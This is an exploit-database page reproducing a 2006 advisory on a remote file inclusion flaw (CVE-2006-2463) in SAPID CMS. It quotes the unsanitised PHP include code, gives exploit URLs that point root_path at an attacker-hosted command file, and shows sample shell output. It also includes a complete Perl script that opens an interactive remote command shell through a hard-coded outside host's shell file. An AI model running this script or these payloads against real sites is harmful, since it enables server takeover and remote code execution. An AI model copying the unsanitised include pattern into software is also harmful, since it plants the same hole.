SAPID CMS remote File Inclusion vulnerabilities
CVE
Category
Price
Severity
CVE-2006-2463
CWE-98
Not specified
High
Author
Risk
Exploitation Type
Date
RoMaNcYxHaCkEr
High
Remote
2006-08-15
CPE PURL
cpe:cpe:/a:sapid_cms:all_versions pkg:pkg:exploitalert/sapid-cms-remote-file-inclusion-vulnerabilities
CVSS vector description
Metric
Value
Metric Description
Value Description
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006080055 Below is a copy: ########################################################################
#
# Title: SAPID CMS remote File Inclusion Vulnerabilities
#
# Author: Simo64 <simo64_at_morx_org>
#
# Discovered: 06 Aout 2006
#
# MorX Security Research Team
#
# http://www.morx.org
#
# Vendor : SAPID CMS
#
# Version : 123 rc3
#
# Website : http://sapid.sourceforge.net
#
# Severity: Critical
#
# Details:
#
#
# [+] Remote File Inclusion
#
# 1) vulnerable code in usr/extensions/get_infochannel.inc.php lines( 8 - 9 )
#
# if(!defined("common_extfunctions")) { define("common_extfunctions", "loaded");
# include($root_path."usr/system/common_extfunctions.inc.php"); }
#
# 2) vulnerable code in usr/extensions/get_tree.inc.php lines( 9 - 10 )
#
# if(!defined("common_extfunctions")) { define("common_extfunctions", "loaded");
# include($GLOBALS["root_path"]."usr/system/common_extfunctions.inc.php");
}
#
# $root_path , $GLOBALS["root_path"] variable are not sanitized ,before it can be used to include files
#
# [-] Exploit :
#
# http://localhost/usr/extensions/get_infochannel.inc.php?root_path=http:/
/attacker/cmd.txt?cmd=id;pwd
#
# http://localhost/usr/extensions/get_tree.inc.php?GLOBALS["root_path"]=ht
tp://attacker/cmd.txt?cmd=id;pwd
#
#======================================
# Poc Remote Command Execution Exploit:
#======================================
#
# http://www.morx.org/sapid.txt
#
# C:>perl sapid.pl http://127.0.0.1
#
# ===============================================================
# = SAPID 123_rc3 (rootpath) Remote Command Execution Exploit =
# ===============================================================
# = MorX Security Research Team - www.morx.org =
# = Coded by Simo64 - simo64 (at) www.morx (dot) org [email concealed] =
# ===============================================================
# simo64 (at) morx (dot) org [email concealed] :~$ id; pwd; ls
# uid=48(apache) gid=48(apache) groups=48(apache)
# get_calendar.inc.php
# get_filter_list.inc.php
# get_gb_records.inc.php
# get_infochannelfilter.inc.php
# get_infochannel.inc.php
# get_rss.inc.php
# get_searchresults.inc.php
# get_survey.inc.php
# get_track.inc.php
# get_tree.inc.php
# soap_call.inc.php
# /home/public_html/sapid/usr/extensions
# simo64 (at) morx (dot) org [email concealed] :~$ exit
#
# Enjoy !
#
#!/usr/bin/perl
use LWP::Simple;
print "n===============================================================n";
print "= SAPID 123_rc3 (rootpath) Remote Command Execution Exploit =n";
print "===============================================================n";
print "= MorX Security Research Team - www.morx.org =n";
print "= Coded by Simo64 - [email protected] =n";
print "===============================================================nn";
my $targ,$rsh,$path,$con,$cmd,$data,$getit ;
$targ = $ARGV[0];
$rsh = $ARGV[1];
if(!$ARGV[1]) {$rsh = "http://zerostag.free.fr/sh.txt";}
if(!@ARGV) { &usage;exit(0);}
chomp($targ);
chomp($rsh);
$path = $targ."/usr/extensions/get_infochannel.inc.php";
$con = get($path) || die "[-]Cannot connect to Host";
sub usage(){
print "Usage : perl $0 host/path [OPTION]nn";
print "Exemples : perl $0 http://127.0.0.1n";
print " perl $0 http://127.0.0.1 http://yoursite/yourcmd.txtnn";
}
while ()
{
print "[email protected] :~$ ";
chomp($cmd=<STDIN>);
if ($cmd eq "exit") { print "nEnjoy !nn";exit(0);}
$getit = $path."?root_path=".$rsh."?&cmd=".$cmd;
$data=get($getit);
if($cmd eq ""){ print "Please enter command !n"; }
else{ print $data ;}
}
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum